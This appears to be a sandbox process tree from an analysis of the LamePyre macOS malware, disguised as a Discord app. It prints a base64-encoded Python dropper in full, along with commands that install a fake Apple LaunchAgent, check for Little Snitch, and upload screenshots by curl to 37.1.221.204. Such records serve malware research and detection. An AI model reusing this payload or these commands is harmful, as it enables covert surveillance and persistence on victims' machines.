LamePyre Process Tree

{
    "process_name": "/Users/zingo123/Downloads/LamePyre/DiscordApp.app/Contents/MacOS/Application Stub", 
    "pid": 2547, 
    "command_line_args": "./Application Stub", 
    "child_processes": [
        {
            "process_name": "/bin/bash", 
            "pid": 2549, 
            "command_line_args": "/bin/bash -c PAYLOAD_DATA=\"IyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KCmltcG9ydCBiYXNlNjQKaW1wb3J0IGxvZ2dpbmcKaW1wb3J0IG9zCmltcG9ydCBzdWJwcm9jZXNzCmZyb20gc3lzIGltcG9ydCBleGl0CmZyb20gdGV4dHdyYXAgaW1wb3J0IGRlZGVudAoKCkxPQURFUl9PUFRJT05TID0gewogICAgImxhdW5jaF9hZ2VudF9uYW1lIjogImNvbS5hcHBsZS5zeXN0ZW1rZWVwZXIiLAogICAgInBheWxvYWRfZmlsZW5hbWUiOiAiLnN5c3RlbWtlZXBlciIsCiAgICAicHJvZ3JhbV9kaXJlY3RvcnkiOiBvcy5wYXRoLmV4cGFuZHVzZXIoIn4vLnN5c3RlbSIpCn0KUEFZTE9BRF9CQVNFNjQgPSAiSXlFdmRYTnlMMkpwYmk5d2VYUm9iMjRLQ21sdGNHOXlkQ0J6ZVhNc1ltRnpaVFkwTzJWNFpXTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTZ25ZMVpDZFZWVlJtRmtNa3A0VVd4dk9Vb3hRa05pU0VaS1ZtbGpTMkZYTVhkaU0wb3dTVWhPTldONWQyZGtXRXB6WWtkc2FVMXFkSEJpV0VKMlkyNVJaMk50VlhOSlNFNHhXVzVDZVdJeVRteGpNMDAzV1RJeGEwbEVNR2RKYmtKNlNVTXhiRnBwUWpoSlIyUjVXbGhCWjFSSGJEQmtSM2hzV0VOQ1ZHSnRiREJaTW1kblprTkNibU50Vm5kSlF6RXlTVWRrZVZwWVFXbERia0o2U1VRd1oyTXpWbWxqU0VwMldUSldlbU41TlZGaU0wSnNZbWxvYW1KWFVYTkpTRTV2V2xkNGMxQldVbmxrVjFWelNVaE9NRnBIT1RGa1JERjZaRmRLZDJOdE9XcGFXRTU2VEd4Q1NsVkZWWEJEYlRreFpFTkJPVWxJUW5wTWJrNHdXa2M1TVdSRE5YbGFWMFpyUzBOclMyTklUWFZqTTFKcllqTldNRXh0VG5OaU0wNXNTME5yUzJGWFdXZGpiVlYxWXpKV2FHTnRUbTlMUTBwTllWaFNNR0pIVldkVk1qVndaRWRPYjBscGQyZGlNMVl3UzFSdlMwbERRV2RqTTJ4NlRHMVdOR0ZZVVc5TFVYQjJVRlk1Wm1GWE1YZGlNMG93V0RFNGIyVjZTVFpLTTFaNVlrZDRjRmxxU1c1TVJFMDJTak5XZVdKSGVIQlphVFY1V2xoR01WcFlUakJLTXpGaVl6TnNla3h1V214amJrNXdZakkxWm1GWE5XMWlNWE4zV0ZZd2MxcHVTblppVjNod1l6TlJPVmQ1Wkdsa1YyeHpXa1k1ZG1OSFZuVmFXRWx1V0ZOcmRWbHVWbkJpUjFKbVlqTkNiR0p0Vm5sTFEyczNWbFZGT1Vvd01YWmxiV3h6WWtkRmRrNVROSGRKUTJoT1dWZE9jR0p1VW5aak1tYzNTVVZzZFdSSFZuTkpSVEZvV1hsQ1VGVjVRbGxKUkVWM1RHcEZlRTk1UW5sa2FtOHdUbE0wZDB0VFFraGFWMDV5WW5rNGVVMUVSWGROUkVWM1RWTkNSMkZZU214YWJUazBUSHBSTVV4cVFXNVBNamgxV1ZkU2EyRkhWbWhhUjFaNVkzb3hZa3REWkZaak1sWjVURlZHYmxwWE5UQktlWGhXVVZOc1pFOHlSVGxpZVRWMlkwZFdkVXREWkc5a1NGSjNUMms0ZGsxNlkzVk5VelI1VFdwRmRVMXFRVEJQYW1kM1QwUkJkbUZYTld0YVdHZDFXVmhPZDBwNWEzVmpiVlpvV2tObmNFOHlkR3hsVkRCdVRqSkplazVxVFRWWlZGSm9XV3BOTlU1NldURk9lazAxV1ZSV2JFMUhWbXRPZWxacFdYcG5kMDFVV1c1UE1VMXpZV2w0ZG1SWVVUbGpiVVoxV2pKVmIwMXFWVEpMVTNkM1RFWjBaRU50V25aamFVSndTVWRzZFVsSVNtaGliV1JzUzBSSk1VNXBhelpEYVVGblNVTkNjVkJUYUhGTE1VNWlZVll3Y21JelNtdExSM1JzWlZaMGNFcFhlR3hpYVdoeVdsaHJjRmhUYTNCS1ZFa3hUbWR2WjBsRFFXZFZNWFJ3V0ZONFZGY3ljR1JRVms1aVlXd3djMVV4ZEhCWVVYQndVRmR2T1UxQmNHMWlNMGxuV1RKb2FHTnBRbkJpYVVKb1QyZHZaMGxEUVdkaFZEQnZZVk56ZUV0VFZYbE9WRmxMU1VOQlowbEhiemxMUjI5eVZURjBjRmhUYTJ4TmFsVXlRMmxCWjBsRFFsUlhNbXhrVEVaT1ltRnNNRGxWTVhSeFdGTjRWRmN5YkdSRGFVRm5TVU5DZG1SWVVYVlpXRUozV2xjMWEwdEhUbTlqYVdoMlkyMVJiMWt5YUdoamFXeGxWVEZ6YjFVeGRIQllVM1JVVnpKd1pFdFRWWGxPVkZwa1MxTnJTMXBZYUd4WmVXZHVTbmsxY1dJeWJIVkxSemt4WkVOcmNDY3BLUT09IgpTQ1JFRU5DQVNUX0JBU0U2NCA9ICJWbFZKUkQxZ2MzbHpkR1Z0WDNCeWIyWnBiR1Z5SUZOUVNHRnlaSGRoY21WRVlYUmhWSGx3WlNCOElHRjNheUFuTDFWVlNVUXZJSHNnY0hKcGJuUWdKRE03SUgwbllBb0tkMmhwYkdVZ1d5QjBjblZsSUYwS1pHOEtDWE5qY21WbGJtTmhjSFIxY21VZ0wzUnRjQzloYkd4dmVTNXdibWNLQ1dOMWNtd2dMVVlnSW5OamNqMUFMM1J0Y0M5aGJHeHZlUzV3Ym1jaUlDSm9kSFJ3T2k4dk16Y3VNUzR5TWpFdU1qQTBMMmhoYm1Sc1pYSXVjR2h3UDNWcFpEMGtWbFZKUkNJSkNtUnZibVU9IgoKUFJPR1JBTV9ESVJFQ1RPUlkgPSBvcy5wYXRoLmV4cGFuZHVzZXIoTE9BREVSX09QVElPTlNbInByb2dyYW1fZGlyZWN0b3J5Il0pCkxBVU5DSF9BR0VOVF9OQU1FID0gTE9BREVSX09QVElPTlNbImxhdW5jaF9hZ2VudF9uYW1lIl0KUEFZTE9BRF9GSUxFTkFNRSA9IExPQURFUl9PUFRJT05TWyJwYXlsb2FkX2ZpbGVuYW1lIl0KCgpkZWYgZ2V0X3Byb2dyYW1fZmlsZSgpOgogICAgcmV0dXJuIG9zLnBhdGguam9pbihQUk9HUkFNX0RJUkVDVE9SWSwgUEFZTE9BRF9GSUxFTkFNRSkKCgpkZWYgZ2V0X2xhdW5jaF9hZ2VudF9kaXJlY3RvcnkoKToKICAgIHJldHVybiBvcy5wYXRoLmV4cGFuZHVzZXIoIn4vTGlicmFyeS9MYXVuY2hBZ2VudHMiKQoKCmRlZiBnZXRfbGF1bmNoX2FnZW50X2ZpbGUoKToKICAgIHJldHVybiBnZXRfbGF1bmNoX2FnZW50X2RpcmVjdG9yeSgpICsgIi8lcy5wbGlzdCIgJSBMQVVOQ0hfQUdFTlRfTkFNRQoKCmRlZiBydW5fY29tbWFuZChjb21tYW5kKToKICAgIG91dCwgZXJyID0gc3VicHJvY2Vzcy5Qb3Blbihjb21tYW5kLCBzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLCBzdGRlcnI9c3VicHJvY2Vzcy5QSVBFLCBzaGVsbD1UcnVlKS5jb21tdW5pY2F0ZSgpCiAgICByZXR1cm4gb3V0ICsgZXJyCgoKcnVuX2NvbW1hbmQoIm1rZGlyIC1wICIgKyBQUk9HUkFNX0RJUkVDVE9SWSkKcnVuX2NvbW1hbmQoIm1rZGlyIC1wICIgKyBnZXRfbGF1bmNoX2FnZW50X2RpcmVjdG9yeSgpKQoKbGF1bmNoX2FnZW50X2NyZWF0ZSA9IGRlZGVudCgiIiJcCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSBwbGlzdCBQVUJMSUMgIi0vL0FwcGxlLy9EVEQgUExJU1QgMS4wLy9FTiIgImh0dHA6Ly93d3cuYXBwbGUuY29tL0RURHMvUHJvcGVydHlMaXN0LTEuMC5kdGQiPgo8cGxpc3QgdmVyc2lvbj0iMS4wIj4KPGRpY3Q+CiAgICA8a2V5PktlZXBBbGl2ZTwva2V5PgogICAgPHRydWUvPgogICAgPGtleT5MYWJlbDwva2V5PgogICAgPHN0cmluZz4lczwvc3RyaW5nPgogICAgPGtleT5Qcm9ncmFtQXJndW1lbnRzPC9rZXk+CiAgICA8YXJyYXk+CiAgICAgICAgPHN0cmluZz4lczwvc3RyaW5nPgogICAgICAgIDxzdHJpbmc+JXM8L3N0cmluZz4KICAgIDwvYXJyYXk+CiAgICA8a2V5PlJ1bkF0TG9hZDwva2V5PgogICAgPHRydWUvPgo8L2RpY3Q+CjwvcGxpc3Q+CiIiIikgJSAoTEFVTkNIX0FHRU5UX05BTUUsIGdldF9wcm9ncmFtX2ZpbGUoKSwgUFJPR1JBTV9ESVJFQ1RPUlkgKyAiLy5oZWxwZXIiKQoKd2l0aCBvcGVuKGdldF9sYXVuY2hfYWdlbnRfZmlsZSgpLCAidyIpIGFzIG91dHB1dF9maWxlOgogICAgb3V0cHV0X2ZpbGUud3JpdGUobGF1bmNoX2FnZW50X2NyZWF0ZSkKCndpdGggb3BlbihQUk9HUkFNX0RJUkVDVE9SWSArICIvLmhlbHBlciIsICJ3IikgYXMgb3V0cHV0X2ZpbGU6CiAgICBvdXRwdXRfZmlsZS53cml0ZShiYXNlNjQuYjY0ZGVjb2RlKFNDUkVFTkNBU1RfQkFTRTY0KSkKCgp3aXRoIG9wZW4oZ2V0X3Byb2dyYW1fZmlsZSgpLCAidyIpIGFzIG91dHB1dF9maWxlOgogICAgb3V0cHV0X2ZpbGUud3JpdGUoYmFzZTY0LmI2NGRlY29kZShQQVlMT0FEX0JBU0U2NCkpCgpvcy5jaG1vZChnZXRfcHJvZ3JhbV9maWxlKCksIDBvNzc3KQpvcy5jaG1vZChQUk9HUkFNX0RJUkVDVE9SWSArICIvLmhlbHBlciIsIDBvNzc3KQoKcnVuX2NvbW1hbmQoImxhdW5jaGN0bCBsb2FkIC13ICIgKyBnZXRfbGF1bmNoX2FnZW50X2ZpbGUoKSkKCmV4ZWMoYmFzZTY0LmI2NGRlY29kZShQQVlMT0FEX0JBU0U2NCkpCg==\"echo $PAYLOAD_DATA | base64 -D | /usr/bin/python &", 
            "child_processes": [
                {
                    "process_name": "/usr/bin/base64", 
                    "pid": 2551, 
                    "command_line_args": "base64 -D"
                }, 
                {
                    "process_name": "/usr/bin/python", 
                    "pid": 2552, 
                    "command_line_args": "/usr/bin/python", 
                    "child_processes": [
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2557, 
                            "command_line_args": "/bin/sh -c mkdir -p /Users/zingo123/.system"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2557, 
                            "command_line_args": "/bin/sh -c mkdir -p /Users/zingo123/.system"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2558, 
                            "command_line_args": "/bin/sh -c mkdir -p /Users/zingo123/Library/LaunchAgents"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2558, 
                            "command_line_args": "/bin/sh -c mkdir -p /Users/zingo123/Library/LaunchAgents"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2559, 
                            "command_line_args": "/bin/sh -c launchctl load -w /Users/zingo123/Library/LaunchAgents/com.apple.systemkeeper.plist"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2559, 
                            "command_line_args": "/bin/sh -c launchctl load -w /Users/zingo123/Library/LaunchAgents/com.apple.systemkeeper.plist"
                        }, 
                        {
                            "process_name": "/bin/sh", 
                            "pid": 2561, 
                            "command_line_args": "/bin/sh -c ps -ef | grep Little\\ Snitch | grep -v grep", 
                            "child_processes": [
                                {
                                    "process_name": "/bin/ps", 
                                    "pid": 2562, 
                                    "command_line_args": "ps -ef"
                                }, 
                                {
                                    "process_name": "/usr/bin/grep", 
                                    "pid": 2564, 
                                    "command_line_args": "grep -v grep"
                                }, 
                                {
                                    "process_name": "/usr/bin/grep", 
                                    "pid": 2563, 
                                    "command_line_args": "grep Little Snitch"
                                }
                            ]
                        }
                    ]
                }, 
                {
                    "process_name": "/usr/sbin/screencapture", 
                    "pid": 2569, 
                    "command_line_args": "screencapture -C -x /tmp/alloy.png"
                }, 
                {
                    "process_name": "/usr/bin/curl", 
                    "pid": 2570, 
                    "command_line_args": "curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=564DD292-04E6-6771-00C7-92A750FA1B0D"
                }, 
                {
                    "process_name": "/usr/sbin/screencapture", 
                    "pid": 2577, 
                    "command_line_args": "screencapture -C -x /tmp/alloy.png"
                }, 
                {
                    "process_name": "/usr/bin/curl", 
                    "pid": 2579, 
                    "command_line_args": "curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=564DD292-04E6-6771-00C7-92A750FA1B0D"
                }
            ]
        }
    ]
}